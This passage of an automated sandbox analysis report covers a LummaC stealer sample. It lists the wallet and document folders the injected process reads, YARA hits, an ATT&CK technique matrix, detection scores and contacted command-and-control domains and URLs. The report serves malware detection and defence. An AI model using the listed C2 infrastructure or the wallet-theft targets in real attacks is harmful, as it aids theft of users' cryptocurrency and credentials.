Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior

Source: Yara match	File source: 00000002.00000003.1965031546.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1921423227.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2014107650.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2034108887.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1967689413.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2021275005.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1966024248.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1921687992.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1964834206.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1921423227.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1866213868.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1867576709.0000000002C16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2013964863.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1920704083.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2013739073.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1866963896.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 7408, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 7408, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	1 Masquerading	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	241 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	141 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	31 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	141 Virtualization/Sandbox Evasion	Distributed Component Object Model	2 Clipboard Data	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	4 Obfuscated Files or Information	Cached Domain Credentials	23 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
Armanivenntii_crypted_EASY.exe	63%	ReversingLabs	ByteCode-MSIL.Ransomware.RedLine
Armanivenntii_crypted_EASY.exe	100%	Avira	TR/AVI.Lumma.dplvj
Armanivenntii_crypted_EASY.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\d3d9x.dll	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\d3d9x.dll	66%	ReversingLabs	Win32.Trojan.Midie

Source	Detection	Scanner	Label
https://lev-tolstoi.com/api(	0%	Avira URL Cloud	safe
https://lev-tolstoi.com/P	0%	Avira URL Cloud	safe
https://lev-tolstoi.com/h	0%	Avira URL Cloud	safe
https://lev-tolstoi.com/yo	0%	Avira URL Cloud	safe
southedhiscuso.shop	0%	Avira URL Cloud	safe
cagedwifedsozm.shop	100%	Avira URL Cloud	malware
https://lev-tolstoi.com/apial	0%	Avira URL Cloud	safe
https://lev-tolstoi.com:443/apiapi	0%	Avira URL Cloud	safe
weaknessmznxo.shop	100%	Avira URL Cloud	malware
consciousourwi.shop	100%	Avira URL Cloud	malware
https://lev-tolstoi.com/apidows6$	0%	Avira URL Cloud	safe
https://lev-tolstoi.com/sj	0%	Avira URL Cloud	safe
weiggheticulop.shop	100%	Avira URL Cloud	malware
potentioallykeos.shop	100%	Avira URL Cloud	malware
interactiedovspm.shop	100%	Avira URL Cloud	malware
https://lev-tolstoi.com/;~	0%	Avira URL Cloud	safe
https://lev-tolstoi.com/apiH	0%	Avira URL Cloud	safe
https://southedhiscuso.shop:443/api	100%	Avira URL Cloud	malware
https://lev-tolstoi.com/9	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
steamcommunity.com	23.55.153.106	true	false	high
lev-tolstoi.com	172.67.157.254	true	false	high
potentioallykeos.shop	unknown	unknown	true	unknown
consciousourwi.shop	unknown	unknown	true	unknown
southedhiscuso.shop	unknown	unknown	true	unknown
interactiedovspm.shop	unknown	unknown	true	unknown
weaknessmznxo.shop	unknown	unknown	true	unknown
charecteristicdxp.shop	unknown	unknown	true	unknown
weiggheticulop.shop	unknown	unknown	true	unknown
deicedosmzj.shop	unknown	unknown	true	unknown
cagedwifedsozm.shop	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
weaknessmznxo.shop	true	Avira URL Cloud: malware	unknown
cagedwifedsozm.shop	true	Avira URL Cloud: malware	unknown
southedhiscuso.shop	true	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199724331900	false		high
consciousourwi.shop	true	Avira URL Cloud: malware	unknown
https://lev-tolstoi.com/api	false		high
weiggheticulop.shop	true	Avira URL Cloud: malware	unknown
potentioallykeos.shop	true	Avira URL Cloud: malware	unknown
interactiedovspm.shop	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	aspnet_regiis.exe, 00000002.00000003.1866856303.000000000500F000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1867108494.0000000004FF8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	aspnet_regiis.exe, 00000002.00000003.1866856303.000000000500F000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1867108494.0000000004FF8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/?subsection=broadcasts	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	aspnet_regiis.exe, 00000002.00000003.1968573576.0000000002C3D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/yo	aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2034108887.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1921423227.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866963896.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/subscriber_agreement/	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/apial	aspnet_regiis.exe, 00000002.00000003.2034108887.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.valvesoftware.com/legal.htm	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	aspnet_regiis.exe, 00000002.00000003.1968573576.0000000002C3D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/api(	aspnet_regiis.exe, 00000002.00000003.1921423227.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/P	aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1921423227.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866963896.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl	aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/h	aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866963896.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=0Xxx	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	aspnet_regiis.exe, 00000002.00000003.1968573576.0000000002C3D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com:443/apiapi	aspnet_regiis.exe, 00000002.00000002.2310023537.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2034108887.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866963896.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1921423227.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2049691966.0000000002BBD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/	aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1921423227.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2310585702.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866963896.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp	false		high
http://store.steampowered.com/privacy_agreement/	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/points/shop/	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://southedhiscuso.shop:443/api	aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866963896.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1921423227.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	aspnet_regiis.exe, 00000002.00000003.1866856303.000000000500F000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1867108494.0000000004FF8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	aspnet_regiis.exe, 00000002.00000003.1966091168.0000000005003000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	aspnet_regiis.exe, 00000002.00000003.1968573576.0000000002C3D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/sj	aspnet_regiis.exe, 00000002.00000003.2021686347.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1965527761.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1964908973.0000000002C08000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1965112088.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2034108887.0000000002C09000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2013739073.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.rootca1.amazontrust.com0:	aspnet_regiis.exe, 00000002.00000003.1966091168.0000000005003000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	aspnet_regiis.exe, 00000002.00000003.1866541610.000000000503C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866624782.0000000005035000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	aspnet_regiis.exe, 00000002.00000003.1866856303.000000000500F000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1867108494.0000000004FF8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199724331900/inventory/	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	aspnet_regiis.exe, 00000002.00000003.1967836712.000000000510B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://store.steampowered.com/privacy_agreement/	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.microsof	aspnet_regiis.exe, 00000002.00000003.1866541610.000000000503E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	aspnet_regiis.exe, 00000002.00000003.1866624782.0000000005010000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=THDq-gsQ	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/about/	aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/my/wishlist/	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/;~	aspnet_regiis.exe, 00000002.00000003.2021686347.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2034108887.0000000002C09000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2013739073.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
